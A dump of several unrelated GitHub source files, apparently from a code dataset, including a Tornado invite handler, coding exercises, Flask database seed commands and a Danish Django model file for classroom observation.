},\n)\n","repo_name":"naoko/utilspy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"70557501638","text":"from base import BaseHandler\nfrom tornado.gen import coroutine\nimport rethinkdb as r\n\n\nclass RedeemInviteHandler(BaseHandler):\n\n @coroutine\n def post(self):\n\n invite = self.request.data\n query = self.db.requests.get(invite['code'])\n result = yield self.db.run_query(query)\n if not result:\n self.error(code=403, message=\"Invalid Invite Code\", data=invite['code'])\n return\n if result['used']:\n self.error(code=403, message=\"Invite Code Already Used\")\n yield self.db.run_query(query.update({\"used\": True}))\n now = r.now()\n user = {\n \"email\": invite['email'],\n \"createdAt\": now,\n \"modifiedAt\": now\n }\n query = self.db.users.insert(user)\n result = yield self.db.run_query(query)\n key = result['generated_keys'][0]\n response = {\n \"key\": key\n }\n self.respond(response, code=201)","repo_name":"Deiru2k/Lightning","sub_path":"handlers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"16181839110","text":"\"\"\"\nProblem Statement\nFind and return the nth row of Pascal's triangle in the form a list.\n n is 0-based.\n\nFor exmaple, if n = 4, then output = [1, 4, 6, 4, 1].\n\nTo know more about Pascal's triangle:\n https://www.mathsisfun.com/pascals-triangle.html\n\n\"\"\"\n\n\n# Solution\n\n'''\nPoints to note:\n1. We have to return a list.\n2. The elements of n^th row are made up of elements of (n-1)^th row.\n This comes up till the 1^st row. We will follow a top-down approach.\n3. Except for the first and last element, any other element at position `j`\n in the current row is the sum of elements at position `j`\n and `j-1` in the previous row.\n4. Be careful about the edge cases,\n example, an index should never be a NEGATIVE at any point of time.\n'''\n\n\ndef nth_row_pascal(n):\n if n == 0:\n return [1]\n\n # First row\n current_row = [1]\n\n ''' Loop from 1 to n; `i` denotes the row number'''\n for i in range(1, n + 1):\n # Set the `current_row` from previous iteration as the `previous_row`\n previous_row = current_row\n\n # Let's build the fresh current_row gradually\n # add the default first element at the 0^th index of the `i^th` row\n current_row = [1]\n\n '''\n Loop from 1 to (i-1);\n `j` denotes the index of an element with in the `i^th` row\n '''\n # Example, for 5th row we have considered n=4,\n # we will iterate index from 1 to 3, because\n # the default element at the 0^th index has already been added\n for j in range(1, i):\n\n # An element at position `j` in the current row is the\n # sum of elements at position `j` and `j-1` in the previous row.\n next_number = previous_row[j] + previous_row[j - 1]\n\n # Append the new element to the current_row\n current_row.append(next_number)\n\n # append the default last element\n current_row.append(1)\n return current_row\n\n\ndef test_function(test_case):\n n = test_case[0]\n solution = test_case[1]\n output = nth_row_pascal(n)\n if solution == output:\n print(\"Pass\")\n else:\n print(\"Fail\")\n\n\nn = 0\nsolution = [1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 1\nsolution = [1, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 2\nsolution = [1, 2, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 3\nsolution = [1, 3, 3, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n\nn = 4\nsolution = [1, 4, 6, 4, 1]\ntest_case = [n, solution]\ntest_function(test_case)\n","repo_name":"thehimel/data-structures-and-algorithms-udacity","sub_path":"m02c01-arrays-linked-lists/i16e00_pascal's_triangle.py","file_name":"i16e00_pascal's_triangle.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"73520362116","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\n\n\nif __name__==\"__main__\":\n n, k = map(int, input().split())\n graph=[list(map(int, input().split())) for _ in range(n)]\n s, x, y = map(int, input().split())\n queue=deque()\n\n\n for idx_k in range(1, k+1):\n for i in range(n):\n for j in range(n):\n if graph[i][j]==idx_k:\n queue.append([i,j,0])\n \n while queue:\n i, j, t= queue.popleft()\n\n if t==s:\n break\n\n dx=[0,1,0,-1]\n dy=[1,0,-1,0]\n\n for idx in range(4):\n nx = i+dx[idx]\n ny = j+dy[idx]\n\n if 0<=nx=stock):\r\n profit.append(6*stock)\r\n else:\r\n profit.append(x*6-2*(stock-x))\r\n averageProfit=sum(profit)/len(profit)\r\n return averageProfit\r\n\r\na=[]\r\nfname=open(\"milk.txt\")\r\nfline=fname.readline()\r\nwhile (fline):\r\n a.append(int(fline))\r\n fline=fname.readline()\r\n \r\nprint (\"Mean of demand=\",np.mean(a))\r\nprint (\"Standard deviation of demand=\",np.std(a))\r\nplt.plot(a)\r\nplt.show()\r\nplt.hist(a)\r\nplt.xlabel(\"Demand\")\r\nplt.ylabel(\"Frequency\")\r\nplt.show()\r\n\r\nstock=int(input(\"Enter the value of stock you want to keep:\"))\r\nprint(\"Profit Earned=\",profitfun(stock,a))\r\n\r\nxdemand=[]\r\nxprofit=[]\r\nfor i in [500,600,700,800,900,1000,1100,1200,1300,1400,1500]:\r\n xdemand.append(i)\r\n xprofit.append(profitfun(i,a))\r\nplt.plot(xdemand,xprofit)\r\nplt.xlabel(\"quantity\")\r\nplt.ylabel(\"profit\")\r\nindexoptimum=xprofit.index(max(xprofit))\r\noptimumStocks=xdemand[indexoptimum]\r\nprint(\"Stocks for maximum profit=\"+str(optimumStocks))\r\nplt.show()\r\n ","repo_name":"svmldon/IE_507_Modelling_lab","sub_path":"LAB 06/lab06ex1 submitted.py","file_name":"lab06ex1 submitted.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21811874702","text":"from flask.cli import AppGroup\nfrom .users import seed_users, undo_users\nfrom .spots import seed_spots,undo_spots\nfrom .images import seed_images,undo_images\nfrom .reviews import seed_reviews, undo_reviews\nfrom .hosts import seed_hosts,undo_hosts\nfrom .amenities import seed_amenities, undo_amenities\nfrom .bookings import seed_bookings, undo_bookings\nfrom .favorites import seed_favorites, undo_favorites\n\n# Creates a seed group to hold our commands\n# So we can type `flask seed --help`\nseed_commands = AppGroup('seed')\n\n\n# Creates the `flask seed all` command\nfrom app.models.db import db, environment, SCHEMA\n\n@seed_commands.command('all')\ndef seed():\n if environment == 'production':\n # Before seeding, truncate all tables prefixed with schema name\n db.session.execute(f\"TRUNCATE table {SCHEMA}.users RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.hosts RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.spots RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.images RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.reviews RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.amenities RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.bookings RESTART IDENTITY CASCADE;\")\n db.session.execute(f\"TRUNCATE table {SCHEMA}.favorites RESTART IDENTITY CASCADE;\")\n # Add a truncate command here for every table that will be seeded.\n db.session.commit()\n seed_users()\n seed_hosts()\n seed_spots()\n seed_images()\n seed_reviews()\n seed_amenities()\n seed_bookings()\n seed_favorites()\n # Add other seed functions here\n\n\n# Creates the `flask seed undo` command\n@seed_commands.command('undo')\ndef undo():\n undo_users()\n undo_hosts()\n undo_spots()\n undo_images()\n undo_reviews()\n undo_amenities()\n undo_bookings()\n undo_favorites()\n # Add other undo functions here\n","repo_name":"vernfongchao/Stay-The-Night","sub_path":"app/seeds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"41976504747","text":"# File: models.py\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinLengthValidator, MinValueValidator\nfrom django.db import models\nfrom django.db.models.constraints import UniqueConstraint\nfrom django.db.models.fields.related import ForeignKey, ManyToManyField\nfrom django.db.models.fields import AutoField, BooleanField, CharField, DateField, DateTimeField, IntegerField, TextField, URLField\nfrom django.db.models.functions import Random # For use in Fokusgruppe.rand_rank\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nimport uuid\n\n\nclass Skole(models.Model):\n \"\"\"Samle-struktur (klasse) for klasser. En lærer vil være tilknyttet (mindst 1) skole.\"\"\"\n\n # Fields\n navn = models.CharField(max_length=100, help_text='Skolens officielle navn')\n kortnavn = models.CharField(max_length=20, help_text='Skolens korte navn')\n oprettet = models.DateTimeField(\n # auto_now_add=True VISER feltet i http://127.1:8000/admin/prepare/skole/\n #\n #default=datetime.now() # \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato opdateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n # auto_now=True SKJULER feltet i http://127.1:8000/admin/prepare/skole/, =False VISER feltet.\n #\n #default=datetime.now()#,\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n\n # Metadata\n class Meta:\n ordering = ['navn']\n verbose_name_plural = 'skoler'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Skole (en bestemt skole).\"\"\"\n return reverse('skole-detalje-visning', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Skole-objektet (på Admin siden etc.).\"\"\"\n return f\"{self.kortnavn}: {self.navn}\"\n\n\nclass Klasse(models.Model):\n \"\"\"\n Skoleklasser, undervisningsgruppe eller hold. \n Samler Elev-objekter.\n En lærer vil være tilknyttet (ingen eller flere) hold.\n \"\"\"\n\n # Fields\n navn = models.CharField(max_length=100, help_text='Holdets administrative navn')\n kortnavn = models.CharField(max_length=20, help_text='Holdets korte navn')\n oprettet = models.DateTimeField(\n #default=datetime.now() # \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=datetime.now(), #\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n skole = models.ForeignKey('Skole', on_delete=models.RESTRICT, null=True)\n startår = models.IntegerField(\n validators=[ MinValueValidator(1950), MaxValueValidator(2050)],\n help_text='Firecifret årstal for holdstart'\n )\n studieretning = CharField(\n max_length=3,\n choices=[\n ('stx', 'STX'),\n ('hf', 'HF'),\n ('htx', 'HTX'),\n ('hhx', 'HHX'),\n ('eux', 'EUX'),\n ('eud', 'EUD'),\n ('etc', 'Andet')\n ], \n default='stx', \n help_text='Klassens studieretning'\n )\n \"\"\"Fortløbende nummerering af den runde/omgang af samplinger, https://trello.com/c/mDSvj2t2 , klassens elever sættes sammen i, i fokusgrupper \"\"\"\n fokus_runde = models.IntegerField(\n validators=[ MinValueValidator(1), MaxValueValidator(999)],\n help_text='(automatisk) løbenummer for samplingsrunde til fokusgruppe'\n )\n \"\"\"Antal medlemmer i fokusgruppe\"\"\"\n fokus_antal = models.IntegerField(\n validators=[ MinValueValidator(1), MaxValueValidator(35)], \n default=5,\n help_text='Standardstørrelse af klassens fokusgruppe'\n )\n note = models.TextField(\n max_length=200, \n blank=True,\n null=True,\n help_text='Lærerens generelle noter om holdet, dets lokale eller historik'\n )\n\n # Metadata\n class Meta:\n ordering = ['navn']\n verbose_name = 'klasse'\n verbose_name_plural = 'klasser'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return reverse('hold-detalje-visning', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Klasse-objektet (på Admin siden etc.).\"\"\"\n return f\"{self.kortnavn} ({self.skole.kortnavn}): {self.navn}.\"\n\n\nclass Elev(models.Model):\n \"\"\"\n Underviste personer. En lærer vil være tilknyttet (ingen eller flere) hold.\n Portrætbillede (foto) evt. i separat tabel/Model.\n \"\"\"\n\n # Fields\n id = models.UUIDField( # https://stackoverflow.com/a/34264443/888033\n primary_key=True, \n default=uuid.uuid4, \n editable=False\n )\n oprettet = models.DateTimeField(\n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n auto_now=True,\n )\n fornavn = models.CharField(\n max_length=50, \n validators=[MinLengthValidator(2)],\n help_text='Personens officielle fornavn(e) som i protokol'\n )\n efternavn = models.CharField(\n max_length=50, \n validators=[MinLengthValidator(2)],\n help_text='Personens officielle efternavn(e) som i protokol'\n )\n kaldenavn = models.CharField(\n max_length=15, \n null=True,\n blank=True,\n help_text='Det navn, personen ønsker brugt i daglig tiltale'\n )\n klasse = models.ForeignKey('Klasse', on_delete=models.RESTRICT, null=True)\n unilogin = models.CharField(\n max_length=8, \n validators=[MinLengthValidator(8)],\n help_text='Personens officielle fornavn(e) som i protokol'\n )\n indmeldt = models.DateField(\n blank=True,\n null=True,\n help_text='Dato for hvornår eleven begynder at gå i klassen'\n )\n udmeldt = models.DateField(\n blank=True,\n null=True,\n help_text='Dato for hvornår eleven er holdt op med at gå i klassen'\n )\n mail = models.EmailField(help_text='Mail, læreren kan bruge til kommunikation med eleven')\n # https://stackoverflow.com/q/19130942/888033\n mobil = models.CharField(\n max_length=15, \n validators=[MinLengthValidator(8)],\n help_text='Mobiltelefonnummer, system og lærer kan bruge til kommunikation med eleven'\n )\n note = models.TextField(\n max_length=200, \n null=True,\n blank=True,\n help_text='Lærerens noter om eleven, elevens lokale eller historik. OBS der er mulighed andetsteds for løbende observationsnoter.'\n )\n\n class Meta:\n ordering = ['klasse', 'fornavn', 'efternavn']\n verbose_name_plural = 'elever'\n\n # Methods\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return reverse('elev_detaljer', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Elev (på Admin siden etc.).\"\"\"\n return f\"{self.fornavn} {self.efternavn} ({self.klasse.kortnavn})\"\n\n\nclass FokusGruppe(models.Model):\n \"\"\"\n Randomiseret liste over Elever. Gentagelser af samme Elev vil forekomme i længere forløb.\n En hel Klasse tilføjes ad gangen. \n Rækkefølgen af Elever i Klassen skifter for hver `klasse.fokus_runde`, og bestemmes af `self.rand_rank`.\n Læreren tildeler sig til hvert Modul (hver \"time\") et antal elever fra klassen. Læreren giver hver elev i denne gruppe Adfærdsobservation.\n Reificerer relation mellem Elev og Modul.\n\n Sammenlagt FokusGruppe og Adfærd 1/8 2021\n \"\"\"\n # Fields\n #elev_fg_runde_id = AutoField(primary_key=True, verbose_name='Fokusgruppens Elev-løbenummer')\n id = AutoField(primary_key=True, verbose_name='Fokusgruppe-kandidatens elev+modul-løbenummer')\n \"\"\"Klasse (og dermed `Elev.Klasse.fokus_runde`), samt Elev gives af denne relation.\"\"\"\n elev = models.ForeignKey('Elev', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n \"\"\"\n Modul udfyldes ikke ved generering af del-liste, \n først når læreren udvælger hvor mange, der skal observeres i det pågældende Modul.\n Dato (og tid) gives af denne relation.\n \"\"\"\n \"\"\"\n Modul giver Forløb og knytter Elev til modulets fokusgruppe, når tildelt.\n Eleven i en instantiering (række) præsenteres i liste over Fokusgruppe-kandidater,\n hvis bedømt=False eller =Null. Sættes til =True, når observation registreres.\n \"\"\"\n modul = models.ForeignKey(\n 'Modul', \n models.SET_NULL,\n blank=True, \n null=True, \n )\n\n #@property eller overflødig?\n bedømt = models.BooleanField(null=True, default='')\n\n \"\"\"True, hvis Elev var til stede i Modul? Null indtil Elev er bedømt\"\"\"\n tilstede = BooleanField(null=True, default='')\n \n \"\"\"\n Tilfældig værdi mellem 0 og 1, der tildeles ved oprettelse.\n Sorteringsværdi (indenfor Elev.Klasse.fokus_runde). \n \"\"\"\n rand_rank = models.FloatField(\n validators=[MinValueValidator(0.0), MaxValueValidator(1.0)],\n # https://docs.djangoproject.com/en/3.2/ref/models/database-functions/#random\n # maybe also: https://realpython.com/python-random/\n default=Random(), # Introduced in Django 3.2\n editable=False,\n null=False\n )\n \"\"\"\n De to sociale performance indicators er intenderet til at stimulere/måle elevernes 'Decency Quotient'. \n Den faglige er til at stimulere/måle 'Intelligenskvitient'.\n Scores kan alene registreres (not Null), hvis `tilstede`=True (observation ikke mulig af fraværende elever).\n \"\"\"\n def get_max_score():\n return 4\n spørg = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(get_max_score())], help_text='Score for elevens evne til at søge hjælp på fagligt spørgsmål')\n hjælp = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(4)], help_text='Score for elevens evne til at yde hjælp til faglig problemløsning')\n faglig = IntegerField(blank=True, null=True, validators=[MinValueValidator(1), MaxValueValidator(4)], help_text='Score for elevens evne til at bidrage til en faglig samtale')\n stikord = CharField( blank=True, null=True, max_length=30, help_text='Lærerens observationer i \"tre\" ord')\n reaktion = CharField( blank=True, null=True, max_length=30, help_text='Elevens bemærkning')\n\n class Meta:\n ordering = ['id', 'elev']\n verbose_name = 'fokusgruppe til adfærdsobservation'\n verbose_name_plural = 'fokusgrupper til adfærdsobservation'\n # Suggested by @bdbd https://stackoverflow.com/q/68872046/888033\n # https://docs.djangoproject.com/en/3.2/ref/models/constraints/#uniqueconstraint\n constraints = [UniqueConstraint(fields=['elev', 'modul'], name='unik_modul_elev')]\n \n # Methods\n \"\"\"Giver 'baglæns' URL-kodning mening for denne Model?\"\"\"\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af klassen Klasse (et bestemt hold).\"\"\"\n return reverse('fokusgruppe', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"Streng, som repræsenterer Elev (på Admin siden etc.).\"\"\"\n tmp_forløb = tmp_modul = '-'\n if self.modul:\n tmp_forløb = self.modul.forløb.titel\n if self.modul.afholdt:\n tmp_modul = self.modul.afholdt\n else:\n tmp_modul = 'NA'\n self.modul.forløb.titel\n return f\"{self.elev.fornavn} {self.elev.efternavn}, d. {tmp_modul} om '{tmp_forløb}' (runde {self.klasse.fokus_runde} i {self.klasse.kortnavn})\"\n else:\n tmp_forløb = 'Ukendt'\n return f\"{self.elev.fornavn} {self.elev.efternavn} ikke tildelt (runde {self.klasse.fokus_runde} i {self.klasse.kortnavn})\"\n \n @property # Getter method - avoiding reduncant data entry\n # Frit efter https://www.geeksforgeeks.org/python-property-decorator-property/\n def runde(self):\n \"\"\"Runde af observation, fra Elev.Klasse.fokus_runde (redundant).\"\"\"\n return self.elev.klasse.fokus_runde\n @property\n def klasse(self):\n return self.elev.klasse\n \n #def clean(self,modul):\n \"\"\"\n https://docs.djangoproject.com/en/3.2/ref/models/instances/#django.db.models.Model.clean\n \"\"\"\n # if( modul.forløb.klasse == self.klasse ):\n # if FokusGruppe.elev in [fg.elev for fg in FokusGruppe.objects.filter(modul=FokusGruppe.modul)]:\n # self.modul = modul\n # else:\n # raise( ValidationError(_(f'Modul {modul} har allerede fået tildelt Elev \"{self.elev}\".')) )\n # else:\n # raise( ValidationError(_('Klasse angivet af modul (gennem forløb) stemmer ikke med klasse angivet af elev.')) )\n\nclass Emne(models.Model):\n \"\"\"Faglige emner, som danner rammen om forløb for de enkelte klasser\"\"\"\n id = AutoField(primary_key=True, verbose_name='Emne-løbenummer (automatisk)')\n titel = CharField(max_length=20, help_text='Betegnelse for emnet')\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), #\n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n fag = CharField( # Eller ForeignKey til (ikke oprettet) Model: Fag.\n max_length=3,\n choices=[\n ('mat', 'Matematik'), \n ('it', 'Informationsteknologi')\n ], \n default='Matematik'\n )\n studieretning = CharField(\n max_length=3,\n choices=[\n ('stx', 'STX'),\n ('hf', 'HF'),\n ('htx', 'HTX'),\n ('hhx', 'HHX'),\n ('eux', 'EUX'),\n ('eud', 'EUD'),\n ('etc', 'Andet')\n ], \n default='stx', \n help_text='Klassens studieretning'\n )\n faglige_mål = TextField(max_length=1000, help_text='Bekendtgørelsens og skolens faggruppes krav til emnet')\n note = TextField(\n max_length=1000, \n null=True,\n blank=True,\n help_text='Lærerens krav til og ambitioner for emnet'\n )\n klassetrin = IntegerField(\n validators=[MinValueValidator(1), MaxValueValidator(4)],\n help_text='Årgang, emnet undervises på (siden holdets startår)',\n )\n varighed = IntegerField(help_text='Forventet antal lektioner/moduler')\n\n class Meta:\n ordering = ['fag', 'studieretning', 'klassetrin', 'titel']\n verbose_name_plural = 'emner'\n \n def __str__(self):\n return f\"{self.fag}-{self.studieretning}/{self.klassetrin}: {self.titel}. \"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt instantiering af Emne.\"\"\"\n return reverse('emne-detalje-visning', args=[str(self.id)])\n\n\nclass Forløb(models.Model):\n \"\"\"Forløb er et Emne, der gennemgås i en Klasse fra et bestemt tidspunkt (`påbegyndt`) og som har en planlagt `varighed`.\"\"\"\n id = AutoField(primary_key=True, verbose_name='Forløbs-løbenummer (automatisk)')\n emne = ForeignKey('Emne', on_delete=models.RESTRICT, null=True)\n klasse = ForeignKey('Klasse', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n titel = CharField(max_length=20, help_text='Overskrift for forløbet')\n påbegyndt = DateField(help_text='Dato for planlagt start af forløbet')\n varighed = IntegerField(help_text='Forventet antal lektioner/moduler')\n kommentar = TextField(\n max_length=500, \n null=True,\n blank=True,\n help_text='Præsentation til holdets elever af det konkrete forløb i klassen'\n )\n\n class Meta:\n ordering = ['klasse', 'emne']\n verbose_name_plural = 'forløb'\n\n def __str__(self):\n return f\"{self.klasse.kortnavn}: fra {self.påbegyndt} -- {self.emne}\"\n \n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår et bestemt Forløb.\"\"\"\n return reverse('forloeb-detalje-visning', args=[str(self.id)])\n\n\nclass Modul(models.Model):\n \"\"\"\n Modul er en 'time' eller lektion, der er/bliver `afholdt` på en bestemt dag som del af et Forløb.\n \"\"\"\n id = AutoField(primary_key=True,verbose_name='Modul-løbenummer (automatisk)')\n forløb = ForeignKey('Forløb', on_delete=models.RESTRICT, null=True)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n afholdt = DateField(help_text='Planlagt / faktisk dato for modulet')\n \n class Meta:\n ordering = ['afholdt', 'id']\n verbose_name_plural='moduler'\n\n def __str__(self):\n return f\"Modul {self.id} '{self.forløb.titel}', {self.afholdt} ({self.forløb.klasse}).\"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår et bestemt Modul.\"\"\"\n return reverse('modul_tildel', args=[str(self.id)])\n\n\nclass Video(models.Model):\n \"\"\"\n Præsentation på video (eller i personligt fremmøde) af opgave stillet \n i forbindelse med et Forløb.\n https://trello.com/c/ZReTY2UN\n \"\"\"\n id = AutoField(primary_key=True,verbose_name='Løbenummer (automatisk) for videopræsentation')\n forløb = ForeignKey('Forløb', on_delete=models.RESTRICT, null=False)\n elev = ForeignKey('Elev', on_delete=models.RESTRICT, null=False)\n oprettet = models.DateTimeField(\n #default=timezone.now() \n auto_now_add=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now_add\n )\n opdateret = models.DateTimeField( # NB: Dato odateres ved Model.save() ikke ved QuerySet.update(), se dokumenation!\n #default=timezone.now(), \n auto_now=True, # https://docs.djangoproject.com/en/3.2/ref/models/fields/#django.db.models.DateField.auto_now\n )\n \"\"\"\n Valideres til at ligge efter `forløb.påbegyndt` og før 3 måneder efter denne dato.\n Redundant, når `oprettet` haves?\n \"\"\"\n stillet =DateField(\n help_text='Dato, hvor opgaven blev stillet til elev (eller hold)'\n ) \n \"\"\"Afleveringsfrist Valideres til at ligge efter `stillet` og højst 3 måneder efter denne dato.\"\"\"\n frist = DateTimeField(help_text='Dato og tid for seneste aftalte aflevering')\n \"\"\"\n Gerne oprettelses-tidsstempel fra video-netside\n Valideres til at ligge efter `frist` og højst 3 måneder efter `frist`.\n \"\"\"\n indleveret = DateField(help_text='Dato og tid for faktisk aflevering') \n opgave = CharField(max_length=100, help_text='Opgavetekst for SOLO aktivitet')\n #\"\"\"\n # Knytter eventuelt opgaven, og dermed præsentationen,\n # til en HookED On Thinking aktivitet. \n # I bekræftende fald giver relationen et paradigmatisk - ikke opgave-konkret - \n # SOLO-retteark til SOLO-niveau.\n #\"\"\"\n # solo_aktivitet ManyToManyField\n url = URLField(help_text='Videoens placering (fx skjult på YouTube)')\n egen_solo = CharField(\n max_length=3,\n choices=[\n ('pre', 'Præstrukturelt niveau'), \n ('uni', 'Unistrukturelt niveau'), \n ('mul', 'Multistrukturelt niveau'), \n ('rel', 'Relationelt niveau'), \n ('udv', 'Udvidet-abstrakt niveau')\n ], \n null=True,\n verbose_name=\"Elevens egen bedømmelse efter SOLO\"\n )\n \"\"\"Hvis feltet udfyldes, sker det EFTER elevens egen SOLO bedømmelse.\"\"\"\n lærer_solo = CharField(\n max_length=3,\n choices=[\n ('pre', 'Præstrukturelt niveau'), \n ('uni', 'Unistrukturelt niveau'), \n ('mul', 'Multistrukturelt niveau'), \n ('rel', 'Relationelt niveau'), \n ('udv', 'Udvidet-abstrakt niveau')\n ], \n null=True\n )\n \"\"\" i stedet for (eller som supplement til) SOLO-bedømmelse \"\"\"\n egen_bedømmelse = CharField(\n max_length=100, null=True,\n verbose_name=\"Elevens egen bedømmelse i fri tekst\"\n )\n \"\"\"\n I stedet for (eller som supplement til) SOLO-bedømmelse. \n Hvis feltet udfyldes, sker det efter elevens egen bedømmelse.\n \"\"\"\n lærer_bedømmelse = CharField(\n max_length=100, null=True\n )\n \n class Meta:\n ordering = ['forløb', 'frist', 'elev']\n\n def __str__(self):\n return self.__class__.__name__ + f\" fra {self.elev} indleveret d. {self.indleveret}.\"\n\n def get_absolute_url(self):\n \"\"\"Returnerer URL, der tilgår en bestemt Video.\"\"\"\n return reverse('videopraesentation-detalje-visning', args=[str(self.id)])\n","repo_name":"engelsmann/bedom","sub_path":"prepare/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22837,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"12400175240","text":"import dxchange\nimport numpy as np\nimport deformcg as df\n\nif __name__ == \"__main__\":\n # Model parameters\n n = 128 # object size n x,y\n nz = 128 # object size in z\n ntheta = 1 # number of angles (rotations)\n ptheta = 1\n\n # Load object\n u0 = dxchange.read_tiff(\n 'data/delta-chip-128.tiff')[:, 64:64+ntheta].swapaxes(0, 1)\n\n shifts0 = np.random.random([ntheta, 2]).astype('float32')*10\n with df.SolverDeform(ntheta, nz, n, ptheta) as slv:\n u = slv.apply_shift_batch(u0, shifts0)\n shifts = slv.registration_shift_batch(u, u0, upsample_factor=10)\n print(shifts)\n rec = slv.apply_shift_batch(u, -shifts)\n print('error:', np.linalg.norm(rec-u0)/np.linalg.norm(u0))\n dxchange.write_tiff(\n u0[ntheta//2], 'resshift/delta-chip-128.tiff', overwrite=True)\n dxchange.write_tiff(\n u[ntheta//2], 'resshift/shiftdelta-chip-128.tiff', overwrite=True)\n dxchange.write_tiff(\n rec[ntheta//2], 'resshift/recdefdelta-chip-128.tiff', overwrite=True)\n","repo_name":"nikitinvv/deformcg","sub_path":"tests/test_shifts.py","file_name":"test_shifts.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"36331262681","text":"# To use a consistent encoding\r\nfrom os import path\r\n\r\n# Always prefer setuptools over distutils\r\nfrom setuptools import setup, find_packages\r\n\r\nhere = path.abspath(path.dirname(__file__))\r\n\r\nsetup(\r\n name='romanizer',\r\n packages=find_packages(),\r\n install_requires=['requests', 